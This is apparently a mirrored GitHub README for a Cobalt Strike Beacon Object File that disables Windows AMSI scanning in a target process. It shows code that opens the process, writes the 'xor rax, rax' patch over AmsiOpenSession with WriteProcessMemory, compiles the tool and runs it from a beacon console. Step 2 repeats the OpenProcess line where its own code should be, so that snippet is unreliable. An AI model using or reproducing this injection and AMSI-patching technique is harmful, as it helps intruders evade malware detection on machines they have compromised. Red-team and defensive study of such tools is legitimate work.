Giters

boku7 / injectAmsiBypass

Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Cobalt Strike BOF - Inject AMSI Bypass

Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection.

Running inject-amsiBypass BOF from CobaltStrike

What does this do?

1. Use supplied PID argument to get a handle on the remote process
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
2. Load AMSI.DLL into beacons memory and get the address of AMSI.AmsiOpenSession
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
  • Both beacon and the target process will both have the same address for the symbol.
  • If AMSI.DLL does not exist in the remote process, running this may crash the target process.
3. Write the AMSI bypass to the remote processes memory
unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax
BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten);

Method = AMSI.AmsiOpenSession

Proof of Concept Demo Screenshots

Before - Powershell.exe AMSI.AmsiOpenSession

After - Powershell.exe AMSI.AmsiOpenSession

Compile with x64 MinGW:

x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o inject-amsiBypass.o

Run from Cobalt Strike Beacon Console

beacon> inject-amsiBypass <PID>
  • Make sure to load the inject-amsiBypass.cna script into Cobalt Strikes Script Manager

To Do List

  • Check that AMSI.DLL exists in remote process before injection
  • Add other AMSI bypasses to inject
  • Support x86

Credits / References

Raphael Mudge - Beacon Object Files - Luser Demo
Cobalt Strike - Beacon Object Files
BOF Code References
ajpc500/BOFs
trustedsec/CS-Situational-Awareness-BOF
Sektor7 Malware Dev Essentials course
Offensive Security OSEP

About

Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.

License:MIT License

Languages

Language:C 100.0%